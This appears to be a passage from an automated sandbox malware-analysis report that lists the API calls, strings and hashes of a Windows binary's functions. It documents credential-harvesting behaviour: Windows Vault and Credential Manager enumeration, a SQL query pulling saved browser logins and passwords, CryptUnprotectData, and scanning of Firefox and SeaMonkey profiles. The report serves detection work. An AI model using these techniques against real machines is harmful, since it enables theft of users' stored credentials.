                                                                                                      • Part of subcall function 00403914: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040EAE8,00000000), ref: 00403959
                                                                                                      • Part of subcall function 00403914: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403984
                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040EAFC
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00412852,00000000,?,00000002), ref: 0040EB15
                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 0040EB1C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040ECAE
                                                                                                    • DeleteObject.GDI32(?), ref: 0040ECC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                    • API String ID: 3591293073-28296030
                                                                                                    • Opcode ID: 6da19aa555c7bed2d0e2845f714a8a92bc184691c86e46daa99757c4e6007caf
                                                                                                    • Instruction ID: 080c52e04b9a9da71e958afed37d40c757c3e4bcfe17a76e226a7705e2524219
                                                                                                    • Opcode Fuzzy Hash: 6da19aa555c7bed2d0e2845f714a8a92bc184691c86e46daa99757c4e6007caf
                                                                                                    • Instruction Fuzzy Hash: AE51D1B55083419BD720AFA2DD49A5FB7E8FF84344F000D3FF684A2191DB7998118F6A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040649E, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 173registrytimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004064BF
                                                                                                      • Part of subcall function 0041243B: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412BD7,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 0041244E
                                                                                                    • _wcsnicmp.MSVCRT ref: 00406532
                                                                                                    • memset.MSVCRT ref: 00406556
                                                                                                    • memset.MSVCRT ref: 00406572
                                                                                                    • _snwprintf.MSVCRT ref: 00406592
                                                                                                    • wcsrchr.MSVCRT ref: 004065B9
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000), ref: 004065EC
                                                                                                    • wcscpy.MSVCRT ref: 0040660E
                                                                                                    • memset.MSVCRT ref: 0040650C
                                                                                                      • Part of subcall function 004124D2: RegEnumKeyExW.ADVAPI32(00000000,0041031B,0041031B,?,00000000,00000000,00000000,0041031B,0041031B,00000000), ref: 004124F5
                                                                                                    • RegCloseKey.ADVAPI32(0041031B), ref: 00406646
                                                                                                    • wcscpy.MSVCRT ref: 00406654
                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 0040666B
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 004066A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                    • API String ID: 1094916163-2797892316
                                                                                                    • Opcode ID: 81853d62207d99d531c31d0ed716c2cf284d16864a3fee8647be61f794c5e293
                                                                                                    • Instruction ID: 15df6ea2d0d0f81eeeb102e23d166a4bbba461de2029d0020c9e2baefa447ba6
                                                                                                    • Opcode Fuzzy Hash: 81853d62207d99d531c31d0ed716c2cf284d16864a3fee8647be61f794c5e293
                                                                                                    • Instruction Fuzzy Hash: B45154B2D00229AAEB20EB91DD45BDF77BCAF05314F0104A6F905F3181EB759B94C799
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00442B9A, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442C58,?,00000000,?), ref: 00442BA7
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00442BBC
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00442BC9
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442BD6
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442BE3
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00442BF0
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442BFE
                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442C07
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                    • API String ID: 2238633743-2107673790
                                                                                                    • Opcode ID: 4cbbbc33d6f98a1a90f1a3aaf02ceeca707d66124e78c2d4ec83a15a5b6d8acc
                                                                                                    • Instruction ID: 1c2d82f8b417c654bc4e06f0263b96b67b8070cd3dc46a289596ff27fd6ab134
                                                                                                    • Opcode Fuzzy Hash: 4cbbbc33d6f98a1a90f1a3aaf02ceeca707d66124e78c2d4ec83a15a5b6d8acc
                                                                                                    • Instruction Fuzzy Hash: F901F6B4D40B04AFEB306F728E48E07BEF5EF94B017118C2EE49A92A10D779E800CE14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408E3A, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408B60: memset.MSVCRT ref: 00408B88
                                                                                                      • Part of subcall function 00408B60: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408BAF
                                                                                                      • Part of subcall function 00408B60: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 00408BF0
                                                                                                      • Part of subcall function 00408B60: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00408C19
                                                                                                      • Part of subcall function 00408B60: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 00408C24
                                                                                                      • Part of subcall function 004088FC: ??2@YAPAXI@Z.MSVCRT ref: 00408905
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408EAF
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408ECE
                                                                                                    • DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408EDB
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00408EF0
                                                                                                      • Part of subcall function 00407791: GetTempPathW.KERNEL32(00000104,?), ref: 004077A8
                                                                                                      • Part of subcall function 00407791: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004077BA
                                                                                                      • Part of subcall function 00407791: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 004077D1
                                                                                                      • Part of subcall function 00407428: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040CDA9,?,?,00000000,00000001,?,?,?,0040EABF), ref: 0040743A
                                                                                                    • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408F1A
                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408F2F
                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000104,00409515,00000000), ref: 00408F4A
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00408F51
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00408F5A
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00408F5F
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408F69
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWritememset
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                                                                    • API String ID: 3663438264-4002013007
                                                                                                    • Opcode ID: f63b8f4d64ee9c8199bb34265b37fcc0e8a068ae8ab8a7c0bb19c2df05a899ec
                                                                                                    • Instruction ID: 2a11366ff2004d3c16c4cfbab81dcb60f80862c22b753f3107030b02a86dc53c
                                                                                                    • Opcode Fuzzy Hash: f63b8f4d64ee9c8199bb34265b37fcc0e8a068ae8ab8a7c0bb19c2df05a899ec
                                                                                                    • Instruction Fuzzy Hash: 08414B75900219FBCF10AFA1CD499DFBFBAFF49350F10802AFA04A6150DB349A50CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FAC9, Relevance: 22.7, APIs: 12, Strings: 3, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FAEC
                                                                                                    • memset.MSVCRT ref: 0040FB01
                                                                                                    • memset.MSVCRT ref: 0040FB16
                                                                                                    • memset.MSVCRT ref: 0040FB2B
                                                                                                    • memset.MSVCRT ref: 0040FB40
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                      • Part of subcall function 00412B44: memset.MSVCRT ref: 00412B9D
                                                                                                      • Part of subcall function 00412B44: RegCloseKey.ADVAPI32(?), ref: 00412C04
                                                                                                      • Part of subcall function 00412B44: wcscpy.MSVCRT ref: 00412C12
                                                                                                    • wcslen.MSVCRT ref: 0040FB66
                                                                                                    • wcslen.MSVCRT ref: 0040FB77
                                                                                                    • wcslen.MSVCRT ref: 0040FBAF
                                                                                                    • wcslen.MSVCRT ref: 0040FBBD
                                                                                                    • wcslen.MSVCRT ref: 0040FBF6
                                                                                                    • wcslen.MSVCRT ref: 0040FC04
                                                                                                    • memset.MSVCRT ref: 0040FC8A
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                    • String ID: FA$Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                    • API String ID: 2775653040-1104446308
                                                                                                    • Opcode ID: 4c9450f8ea99d22ec2d2605107b55c3c31a20529b5ddfb391d8933e5d142fd9d
                                                                                                    • Instruction ID: d0882f38846f801dc0a9c0d814cd8595237c2414b81e86a836b7bb8247a8a11d
                                                                                                    • Opcode Fuzzy Hash: 4c9450f8ea99d22ec2d2605107b55c3c31a20529b5ddfb391d8933e5d142fd9d
                                                                                                    • Instruction Fuzzy Hash: 56514472904219AADB20EB51DE86FCE737CAF44304F5004FBF509E6191EA796A88CB5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402829, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 239fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402851
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402865
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402886
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402891
                                                                                                    • memset.MSVCRT ref: 004028AA
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402AFD
                                                                                                      • Part of subcall function 00407791: GetTempPathW.KERNEL32(00000104,?), ref: 004077A8
                                                                                                      • Part of subcall function 00407791: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004077BA
                                                                                                      • Part of subcall function 00407791: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 004077D1
                                                                                                    • memset.MSVCRT ref: 0040291F
                                                                                                      • Part of subcall function 004027BA: SystemTimeToFileTime.KERNEL32(?,?), ref: 004027F2
                                                                                                      • Part of subcall function 004027BA: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040281F
                                                                                                      • Part of subcall function 004080C0: MultiByteToWideChar.KERNEL32(00000000,00000000,004029A1,000000FF,?,?,004029A1,?,?,000003FF), ref: 004080D2
                                                                                                      • Part of subcall function 00403841: LoadLibraryW.KERNELBASE(crypt32.dll,?,00000000,004026A7,?,00000090,00000000,?), ref: 00403850
                                                                                                      • Part of subcall function 00403841: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403862
                                                                                                      • Part of subcall function 00403841: FreeLibrary.KERNEL32(00000000), ref: 00403885
                                                                                                    • memset.MSVCRT ref: 00402A78
                                                                                                    • memcpy.MSVCRT ref: 00402A8B
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AB5
                                                                                                    Strings
                                                                                                    • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 004028EB
                                                                                                    • chp, xrefs: 00402870
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
                                                                                                    • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                                                                    • API String ID: 3603309061-1844170479
                                                                                                    • Opcode ID: 037be8f9e85c690f0bd9db8a3843f2185f440e4f6d21f10e8a6730a64e2cb074
                                                                                                    • Instruction ID: a865a4db0659c4afa2b01af78a7837cc97c664434ea5403e2d8d35a9c9c3702c
                                                                                                    • Opcode Fuzzy Hash: 037be8f9e85c690f0bd9db8a3843f2185f440e4f6d21f10e8a6730a64e2cb074
                                                                                                    • Instruction Fuzzy Hash: EC819072D00118ABDB11EBA59C82BEE777DAF44318F4404BAF508F7281EB785F448B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F8B8, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F8DB
                                                                                                    • memset.MSVCRT ref: 0040F8F0
                                                                                                    • memset.MSVCRT ref: 0040F905
                                                                                                    • memset.MSVCRT ref: 0040F91A
                                                                                                    • memset.MSVCRT ref: 0040F92F
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                      • Part of subcall function 00412B44: memset.MSVCRT ref: 00412B9D
                                                                                                      • Part of subcall function 00412B44: RegCloseKey.ADVAPI32(?), ref: 00412C04
                                                                                                      • Part of subcall function 00412B44: wcscpy.MSVCRT ref: 00412C12
                                                                                                    • wcslen.MSVCRT ref: 0040F955
                                                                                                    • wcslen.MSVCRT ref: 0040F966
                                                                                                    • wcslen.MSVCRT ref: 0040F99E
                                                                                                    • wcslen.MSVCRT ref: 0040F9AC
                                                                                                    • wcslen.MSVCRT ref: 0040F9E5
                                                                                                    • wcslen.MSVCRT ref: 0040F9F3
                                                                                                    • memset.MSVCRT ref: 0040FA79
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                    • API String ID: 2775653040-2068335096
                                                                                                    • Opcode ID: c7d6920a5611dae366a895db63d345aa1b08eb34311bf64845a722d4d10a50b3
                                                                                                    • Instruction ID: eff0e124df6d63894f361d744aa42f236ecf03a4ad3bb07a895261ae8376dd41
                                                                                                    • Opcode Fuzzy Hash: c7d6920a5611dae366a895db63d345aa1b08eb34311bf64845a722d4d10a50b3
                                                                                                    • Instruction Fuzzy Hash: 45513172905119A6DB20EB51DE86FCF737CAF44708F1044FBB109E6092EA795B888B5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411C6C, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNELBASE(psapi.dll,00000000,00411C4C,00000000,00411B39,00000000,?), ref: 00411C77
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00411C8B
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00411C97
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00411CA3
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00411CAF
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00411CBB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2238633743-70141382
                                                                                                    • Opcode ID: 0005e479be3028eb591e2217378940e4c0d582d92a121df9708c507b198c41b4
                                                                                                    • Instruction ID: 23d91d145e01c29b990a01d08f29c1eb3cceef68d7e714136082a46180399ce7
                                                                                                    • Opcode Fuzzy Hash: 0005e479be3028eb591e2217378940e4c0d582d92a121df9708c507b198c41b4
                                                                                                    • Instruction Fuzzy Hash: 02F0D474980744AAEB30AF759D0DE06BEF0EFA8701721482EE1C193650D67990A0DF89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408943, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004037B1: LoadLibraryW.KERNEL32(advapi32.dll,00000000,0040895F,?,00000000,?), ref: 004037BE
                                                                                                      • Part of subcall function 004037B1: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037D7
                                                                                                      • Part of subcall function 004037B1: GetProcAddress.KERNEL32(?,CredFree), ref: 004037E3
                                                                                                      • Part of subcall function 004037B1: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 004037EF
                                                                                                      • Part of subcall function 004037B1: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 004037FB
                                                                                                      • Part of subcall function 004037B1: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403807
                                                                                                    • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040897C
                                                                                                    • wcslen.MSVCRT ref: 004089A2
                                                                                                    • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004089D8
                                                                                                    • memset.MSVCRT ref: 00408A4F
                                                                                                    • memcpy.MSVCRT ref: 00408A70
                                                                                                    • _wcsnicmp.MSVCRT ref: 00408AB5
                                                                                                    • wcschr.MSVCRT ref: 00408ADD
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 00408B01
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                    • API String ID: 1313344744-1864008983
                                                                                                    • Opcode ID: c9d644f8f2cbec4fded12401a3b59459f4a851785b7a31e371b5205da80b87ec
                                                                                                    • Instruction ID: 4c1973e57354f833fa41100c40d1763250d2486e3013f76e86416860830c9382
                                                                                                    • Opcode Fuzzy Hash: c9d644f8f2cbec4fded12401a3b59459f4a851785b7a31e371b5205da80b87ec
                                                                                                    • Instruction Fuzzy Hash: 005108B1E002099FDB20DFA4C981AAEB7F8FF08305F14446EE959F7241EB74A945CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00442F04, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 2827331108-0
                                                                                                    • Opcode ID: fb88dba151b50938702a4225d776ff9bbbf7c65b4877385143010c4c72580e8c
                                                                                                    • Instruction ID: e38b1cf384e7bf0678c308c8c7b8159e8c5e7089e9b06115971a0f0b7b1de7ca
                                                                                                    • Opcode Fuzzy Hash: fb88dba151b50938702a4225d776ff9bbbf7c65b4877385143010c4c72580e8c
                                                                                                    • Instruction Fuzzy Hash: A2519175D00304DEEB21EFA4D8456AE77B4FB45B12F60422BF421A7291D7798A82CF5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409832, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00409856
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                      • Part of subcall function 00409409: memset.MSVCRT ref: 0040942C
                                                                                                      • Part of subcall function 00409409: memset.MSVCRT ref: 00409444
                                                                                                      • Part of subcall function 00409409: wcslen.MSVCRT ref: 00409460
                                                                                                      • Part of subcall function 00409409: wcslen.MSVCRT ref: 0040946F
                                                                                                      • Part of subcall function 00409409: wcslen.MSVCRT ref: 004094B6
                                                                                                      • Part of subcall function 00409409: wcslen.MSVCRT ref: 004094C5
                                                                                                      • Part of subcall function 004088FC: ??2@YAPAXI@Z.MSVCRT ref: 00408905
                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004098CB
                                                                                                    • wcschr.MSVCRT ref: 004098E2
                                                                                                    • wcschr.MSVCRT ref: 00409902
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409927
                                                                                                    • GetLastError.KERNEL32 ref: 00409931
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040995D
                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040996E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                    • String ID: visited:
                                                                                                    • API String ID: 615219573-1702587658
                                                                                                    • Opcode ID: b5a718b90ccbeb0bb71d209e685553567f2c211bceb8fc4e69fb5858b762815b
                                                                                                    • Instruction ID: 6bfa947b598a055acfffca9d86019716196cb271be9b5c73622bd87f8c60a6d4
                                                                                                    • Opcode Fuzzy Hash: b5a718b90ccbeb0bb71d209e685553567f2c211bceb8fc4e69fb5858b762815b
                                                                                                    • Instruction Fuzzy Hash: 16417372900219ABDF10EF95D985A9FBBB8FF45714F10016AE504F3292DB389E41CB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408F91, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405A09: _wcsicmp.MSVCRT ref: 00405A3A
                                                                                                    • memset.MSVCRT ref: 00408FD9
                                                                                                      • Part of subcall function 00405D08: memset.MSVCRT ref: 00405E04
                                                                                                    • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76022EE0), ref: 004090A7
                                                                                                      • Part of subcall function 00408B2B: _wcsicmp.MSVCRT ref: 00408B44
                                                                                                      • Part of subcall function 004083BD: wcslen.MSVCRT ref: 004083CC
                                                                                                      • Part of subcall function 004083BD: _memicmp.MSVCRT ref: 004083FA
                                                                                                    • _snwprintf.MSVCRT ref: 00409073
                                                                                                      • Part of subcall function 00408185: wcslen.MSVCRT ref: 00408197
                                                                                                      • Part of subcall function 00408185: free.MSVCRT(?,00000001,?,00000000,?,?,00408650,?,000000FF), ref: 004081BD
                                                                                                      • Part of subcall function 00408185: free.MSVCRT(?,00000001,?,00000000,?,?,00408650,?,000000FF), ref: 004081E0
                                                                                                      • Part of subcall function 00408185: memcpy.MSVCRT ref: 00408204
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                    • Opcode ID: f7e4ad6108c72a72f7d3990f8fb7776b5de895e23debea463b5b92a8d52075df
                                                                                                    • Instruction ID: 8dc08579c4c5972565e53ef861a5cf813bbb602b4e97fa5c85aa337e00281d8e
                                                                                                    • Opcode Fuzzy Hash: f7e4ad6108c72a72f7d3990f8fb7776b5de895e23debea463b5b92a8d52075df
                                                                                                    • Instruction Fuzzy Hash: 08318272D00219AADF10EFA5DD85ADFB7B8AF44354F10017FA918B3191DB78AE448F68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041647E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,-7FBEA19E,00000003,00000000,?,?,00000000), ref: 00416556
                                                                                                    • CreateFileA.KERNEL32(?,-7FBEA19E,00000003,00000000,]A,00415DE2,00000000), ref: 0041656E
                                                                                                    • GetLastError.KERNEL32 ref: 0041657D
                                                                                                    • free.MSVCRT(000000FF), ref: 0041658A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                    • String ID: ]A
                                                                                                    • API String ID: 77810686-3942631043
                                                                                                    • Opcode ID: 535ceec80889615b4178fdce19e5339dbab6cb0bfb5825eb6eddee2bb15776f9
                                                                                                    • Instruction ID: e3d245829e665f1948df5b43b512afa905e28acb04eef21c113cc15faad56469
                                                                                                    • Opcode Fuzzy Hash: 535ceec80889615b4178fdce19e5339dbab6cb0bfb5825eb6eddee2bb15776f9
                                                                                                    • Instruction Fuzzy Hash: C94112B1908301AFD720DF25EC4179BBBE6EF94314F11892EF49582290D778D9848F9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409D5E, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
